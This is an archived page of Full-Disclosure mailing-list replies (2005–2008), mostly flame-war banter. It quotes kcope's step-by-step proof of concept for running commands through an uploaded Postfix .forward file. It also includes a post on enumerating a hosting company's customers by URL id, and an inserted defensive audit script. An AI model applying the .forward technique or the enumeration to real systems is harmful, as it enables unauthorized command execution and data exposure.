Re: [Full-disclosure] JaPCrypt

2008-02-06 Thread Epic
Shut up Valdis!

On 2/6/08, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
>
> On Wed, 06 Feb 2008 03:59:30 PST, coderman said:
>
> > since psk without key distribution nor secure secret exchange does not
> > solve the problems that HTTPS solves, to say this is useful in
> > situations where HTTPS is not available is disingenuous.
>
> Sure. So you e-mail the shared secret in a PGP or S/MIME encrypted mail.
>
> So saying that it doesn't work because there's no secure secret exchange
> is disingenuous as well.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>

Re: [Full-disclosure] Gadi Bashing, enough already....

2008-01-17 Thread Epic
Thanks man, I was really starting to get down on Gadi before you explained
how smart he is.


On 1/17/08, Richard Golodner <[EMAIL PROTECTED]> wrote:
>
> I have been friends with Gadi through email for many years now and he
> needs to have someone represent for him. He is a good guy, signs his own
> email instead of the hushmail or Gmail mask.
> On top of all that he is also a knowledgeable and friendly guy. He does a
> great job exploring and reporting the areas of interest to him and has
> helped many people remove bot-net problems from their own nets. Give the
> guy a break, he is a good dude.
> P.S. Punks do not know what federal agencies read these dumb ass lists
> but should be aware that email threats can be taken very far in courts
> these days. Ask old Kevin!
>
> Richard Golodner
> [EMAIL PROTECTED]
> PGP 0x50F20D0C
>
>

Re: [Full-disclosure] [Professional IT Security Providers - Exposed] Cybertrust ( C + )

2007-12-20 Thread Epic
Ignorance is bliss, let him keep smiling.



On 12/20/07, SecReview <[EMAIL PROTECTED]> wrote:
>
> Don, the original poster is anonymous so it's not actually that
> funny.
>
>
> On Thu, 20 Dec 2007 14:59:01 -0500 don bailey
> <[EMAIL PROTECTED]> wrote:
> >SecReview wrote:
> >> Awesome,
> >> ... would you be willing to
> >> answer a few questions that we have so that we can revise our post?
> >> ... and we'd keep you anonymous.
> >>
> >
> >This is the most comedic statement on full disclosure this month.
> >I, too, will ask you publicly for information that I will then
> >say is "completely anonymous when I repost".
> >
> >D
> Regards,
>  The Secreview Team
>  http://secreview.blogspot.com
>

Re: [Full-disclosure] [Professional IT Security Providers -Exposed] Cybertrust ( C + )

2007-12-20 Thread Epic
Isn't ANY review subjective to opinion? I do not understand the basis of
this flame. It appears to me that a lot of the reviews on this site offer
some great insight into the companies being presented. Granted it is an
opinion, but that is what a blog is, isn't it?

On 12/20/07, c0redump <[EMAIL PROTECTED]> wrote:
>
> Exactly.  Your 'grading' is based on your personal opinion.
>
> Do us all a favour and get a proper job.
>
> - Original Message -
> From: "guiness.stout" <[EMAIL PROTECTED]>
> To: 
> Sent: Thursday, December 20, 2007 2:05 PM
> Subject: Re: [Full-disclosure] [Professional IT Security Providers -Exposed] Cybertrust ( C + )
>
>
> > I'm not really clear on how you are grading these companies.  I've had
> > no personal experience with them but I don't decide a company's
> > quality of work simply by their website and what information I get
> > from some customer support person.  These "grades" seem pointless and
> > frankly unfounded.  You should reword your grading system to specify
> > the ease of use of their websites and not the service they provide.
> > Especially if you haven't ordered any services from them.  I'm not
> > defending anyone here just pointing out some flaws in this "grading."
> >
> > On Dec 20, 2007 12:11 AM, secreview <[EMAIL PROTECTED]> wrote:
> >> One of our readers made a request that we review Cybertrust
> >> ("http://www.cybertrust.com"). Cybertrust was recently acquired by
> >> Verizon and as a result this review was a bit more complicated and
> >> required a lot more digging to complete (In fact it's now Cybertrust
> >> and Netsec). Nevertheless, we managed to dig information specific to
> >> Cybertrust out of Verizon representatives. We would tell you that we
> >> used the website for information collection, but in all reality the
> >> website was useless. Not only was it horribly written and full of
> >> marketing fluff, but the services were not clearly defined.
> >>
> >> As an example, when you view the Cybertrust services in their drop down
> >> menu you are presented with the following service offerings: Application
> >> Security, Assessments, Certification, Compliance/Governance, Consulting,
> >> Enterprise Security, Identity Management Investigative Response
> >> /Forensics, Managed Security Services, Partner Security Program Security
> >> Management Program, and SSL Certificates. The first thing you think is
> >> "what the hell?" the second is "ok so they offer 12 services".
> >>
> >> Well as you dig into each service you quickly find out that they do not
> >> offer 12 services, but instead they have 12 links to 12 different pages
> >> full of marketing fluff. As you read each of the pages in an attempt to
> >> wrap your mind around what they are offering as individually packaged
> >> services you're left with more questions than answers. So again, what
> >> the hell?
> >>
> >> Here's an example. Their "Application Security" service page does not
> >> contain a description about a Web Application Security service. In fact,
> >> it doesn't even contain a description about a System Software/Application
> >> security service. Instead it contains a super high level, super vague and
> >> fluffy description that covers a really general idea of "Application"
> >> security services. When you really read into it you find out that their
> >> Application Security service should be broken down into multiple
> >> different defined service offerings.
> >>
> >> Even more frustrating is that their Application Security service is a
> >> consulting service and that they have a separate service offering called
> >> Consulting. When you read the description for Consulting, it is also
> >> vague and mostly useless, but does cover the "potential" for Application
> >> Security.
> >>
> >> So, trying to learn anything about Cybertrust from their web page is like
> >> trying to pull teeth out of a possessed chicken. We decided that we would
> >> move on and call Cybertrust to see what we could get out of them with a
> >> conversation. That proved to be a real pain in the ass too as their
> >> website doesn't list any telephone numbers. We ended up calling Verizon
> >> and after talking to 4 people we finally found a Cybertrust
> >> representative.
> >>
> >> At last, a human being that could provide us with useful information and
> >> answers to our questions about their services. We did receive about 2mb
> >> of materials from our contact at Cybertrust, but the materials were all
> >> marketing fluff, totally useless. That being said, our conversation with
> >> the representative gave us a very clear understanding of how Cybertrust
> >> delivers their services. In all honesty, we were not all that impressed.
> >>
> >> Cybertrust does perform their own Vulnerability Research and Development
> >> (or so we were told) under the umbrella of ICSAlabs which they own.
> >> Usually

Re: [Full-disclosure] Small Design Bug in Postfix - REMOTE

2007-12-14 Thread Epic
And why not replace .profile in that home directory and await the next
login?

This "exploit" is pretty basic and in fact write access to a ~ through FTP
could be used in many ways to "exploit" the machine.

I see no real issue here...



On 12/14/07, Adam N <[EMAIL PROTECTED]> wrote:
>
> No, the idea is that you are a user with no login access, only FTP.
> By doing this, you get shell access (with sane privileges, thankfully)
> when you're supposed to only have FTP.
>
> On Dec 13, 2007 2:34 PM, Fredrick Diggle < [EMAIL PROTECTED]> wrote:
>
> > You have write perms on a user's home directory and this was the best way
> > you could come up with to execute commands? Please send me details on your
> > recipe for boiled water. Be sure to gzip it though as I imagine it is
> > several pages long.
> >
> > YAY!
> >
> >
> > On Dec 13, 2007 2:18 PM, kcope <[EMAIL PROTECTED]> wrote:
> >
> > > Small Design Bug in Postfix - REMOTE
> > >
> > > There's a small issue on how Postfix forwards mails.
> > > A user can have a .forward file in her home directory.
> > > > Inside this file she can specify an alternative recipient
> > > > or use aliasing to execute commands when mail is received.
> > > > From the manpage ALIASES(5)
> > > > "aliases - Postfix local alias database format"
> > > >
> > > > |command
> > > >  Mail is piped into command. Commands that contain
> > > >  special characters, such as whitespace, should be
> > > >  enclosed between double quotes. See local(8) for
> > > >  details of delivery to command.
> > > >
> > > >  When the command fails, a limited amount of command
> > > >  output is mailed back to the sender. The file
> > > >  /usr/include/sysexits.h defines the expected exit
> > > >  status codes. For example, use "|exit 67" to simulate
> > > >  a "user unknown" error, and "|exit 0" to
> > > >  implement an expensive black hole.
> > >
> > > This is fine since postfix properly drops privileges before
> > > executing the command.
> > > The Problem with executing commands via .forward files is that
> > > > if someone manages to place a file into one's home directory and
> > > just sends a file to the mailserver she can execute commands
> > > even when she's not supposed to or does not have the privileges.
> > >
> > > Here is an example exploitation session, the user 'rootkey'
> > > only has ftp access with write permissions and no other privileges
> > > than that.
> > >
> > > Login to FTP server
> > > >telnet box 21
> > > >USER rootkey
> > > >PASS rootkey123
> > > >
> > > Put .forward file with following contents into the home directory of
> > > user 'rootkey'.
> > >
> > > ---snip---
> > > |touch /tmp/XXX
> > > ---snip---
> > >
> > > >put .forward
> > >
> > > Now send an email to user rootkey.
> > >
> > > >telnet box 25
> > > >mail from: rootkey
> > > >rcpt to: rootkey
> > > >data
> > > >.
> > >
> > > RESULT:
> > >
> > > [EMAIL PROTECTED]:~$ ls /tmp/testXXX
> > > /tmp/testXXX
> > >
> > >
> > > signed,
> > >
> > > - -kcope/2007
> > >
> > > --
> > > GMX FreeMail: 1 GB Postfach, 5 E-Mail-Adressen, 10 Free SMS.
> > > Alle Infos und kostenlose Anmeldung: http://www.gmx.net/de/go/freemail
> > >
> > >
> > > ___
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > Hosted and sponsored by Secunia - http://secunia.com/
> > >
> >
> >
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
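For administrators who want to check their own hosts for the situation debated in this thread, the following is an added audit sketch, not code from any poster or from Postfix. It lists `|command` destinations in users' `.forward` files and marks accounts whose shell denies login; the shell list, the passwd rows and the sample tree are constructed, and backslash escapes inside quotes are not handled.

```python
import tempfile
from pathlib import Path

# Shells treated as "no interactive login" (assumed list; adjust per site).
NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false", "/usr/bin/false"}

def split_destinations(line):
    """Split one .forward line on commas that sit outside double quotes."""
    parts, cur, quoted = [], [], False
    for ch in line:
        if ch == '"':
            quoted = not quoted          # quotes group a destination; drop them
        elif ch == "," and not quoted:
            parts.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    parts.append("".join(cur).strip())
    return [p for p in parts if p]

def command_destinations(forward_text):
    """Return the command part of every |command destination."""
    return [dest[1:].strip()
            for line in forward_text.splitlines()
            for dest in split_destinations(line)
            if dest.startswith("|")]

def audit(passwd_text):
    """Return (user, no_login_shell, command) for each piped .forward entry."""
    findings = []
    for entry in passwd_text.splitlines():
        fields = entry.split(":")
        if len(fields) != 7:
            continue
        user, home, shell = fields[0], fields[5], fields[6]
        try:
            text = Path(home, ".forward").read_text(errors="replace")
        except OSError:
            continue                     # no .forward, or unreadable
        findings += [(user, shell in NOLOGIN_SHELLS, c) for c in command_destinations(text)]
    return findings

def demo():
    """Constructed sample tree: FTP-only 'rootkey' plus an ordinary user."""
    root, passwd = tempfile.mkdtemp(), []
    for user, shell, forward in [("rootkey", "/sbin/nologin", "|touch /tmp/XXX\n"),
                                 ("alice", "/bin/bash", "alice@example.org\n")]:
        home = Path(root, user)
        home.mkdir()
        Path(home, ".forward").write_text(forward)
        passwd.append(f"{user}:x:1000:1000::{home}:{shell}")
    return audit("\n".join(passwd))

if __name__ == "__main__":
    print(demo())
```

Where accounts are meant to be file-transfer-only, setting `allow_mail_to_commands = alias` in Postfix's main.cf (the default is `alias, forward`) stops local(8) from running `|command` destinations found in `.forward` files.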

Re: [Full-disclosure] DHS need to get on top of this right now

2007-10-24 Thread Epic
Stop spamming the list with useless garbage and maybe some will respect
rather than hate?


Just a thought...

-E


On 10/24/07, worried security <[EMAIL PROTECTED]> wrote:
>
> I'm sorry everyone I was just trying to highlight a valid point, I didn't
> expect a flame war to erupt.
>
> The DHS need to ban ISPs from talking about infrastructure security in
> public places. It should be classified information don't you all think?
>
> Just because Nanog has been offending for years by talking about similar
> subjects doesn't mean it's OK and action should be taken now to prevent the
> continuation of critical infrastructure security recovery being talked about
> in public.
>
> For anyone who does care about what I'm talking about, I apologize about
> the trolls in my thread who told me I worked in McDonald's and KFC.
>
> I know not everyone hates me so perhaps we can have mature discussions
> about the DHS and Nanog instead of bashing each other saying I work in
> McDonald's, KFC etc.
>
> n3td3v
>

Re: [Full-disclosure] New term "RDV" is born

2007-09-28 Thread Epic
How about SPB - (Stupid Pointless Bullshit)

The noise level on this list is pathetic anymore


On 9/28/07, Troy <[EMAIL PROTECTED]> wrote:
>
> Wouldn't UDV be more appropriate, for unpatched disclosed vulnerability?
> The "R" in RDV means recent. I wouldn't consider a two-month old, but still
> unpatched, vulnerability to be recent, so I wouldn't really be able to call
> it an RDV. I would, however, be able to call it a UDV.
>
> Another option would be EDV, for exploitable disclosed vulnerability, or
> even just UV or EV. Why do we need to bring up the point that it's
> disclosed? How could we be discussing an undisclosed vulnerability?
>

Re: [Full-disclosure] defining 0day

2007-09-25 Thread Epic
At what point does it honestly matter? The term will be used however it
is seen fit to use by the person using it. Trying to redefine it how you
see fit or recast it into what you believe is just wasting time and
effort. Why not do something useful?

This debate takes the same turn of events as the debate over the term
hacker. In the end it matters not what you think and what you want to
believe. The media and money will determine our precious definition.

You will then be forced to decide if you term your code 0day, based on that
definition. Not if you determine the definition of 0day based on your
code.




On 9/25/07, Brian Loe <[EMAIL PROTECTED]> wrote:
>
> On 9/25/07, Gadi Evron <[EMAIL PROTECTED]> wrote:
>
> > No longer good enough.
> >
> > We can get a press scare over a public vuln release, or a wake-up call.
> >
> > I think we can do better as an industry.
> >
>
> Who, then, rewrites all of the reference material? And doesn't any new
> definition simply become definition number 2 in Webster?
>
> Is it really the definition that is lacking or is the use of the word
> at issue? Seems to me, from the beginning of this debate, that it's the
> usage. Far easier to reform the "zero day process" (disclosure, etc.)
> than to redefine the term "zero day". The term is owned by the public,
> the process is owned by those who follow it, the industry.
>
> Couldn't a formal process be developed that does the defining/labeling
> of a particular disclosure?
>

Re: [Full-disclosure] How to discover customers of hosting company for n3td3v.com

2005-11-15 Thread Epic

Carolyn Meinel wrote:


That silly post about n3td3v.com led to fun playtimes with the
Scottsdale, AZ web farm that hosts it.

Name:    n3td3v.com
Address:  64.202.167.129

Nslookup of 64.202.167.129 gives:
Name:    pwdynamic-v02.prod.mesa1.secureserver.net
Address:  64.202.167.120

A traceroute of 64.202.167.129 gives its IP address
as  ip-64-202-167-129.secureserver.net.

Want to know all the fun customers using websites on related
secureserver.net servers? Insert numbers per examples:
http://documents.secureserver.net/show/document.aspx?plvid=1&name=stats_eula
(GoDaddy.com)
http://documents.secureserver.net/show/document.aspx?plvid=2&name=stats_eula
...
http://documents.secureserver.net/show/document.aspx?plvid=111702&name=stats_eula
etc.

How does one develop the procedure for uncovering all these users as
noted above? That is left as an exercise for the student. Hint: it is 
trivial.


Carolyn Meinel
http://techbroker.com
http://happyhacker.org
505-281-9675


Whoa. Absolutely stunning.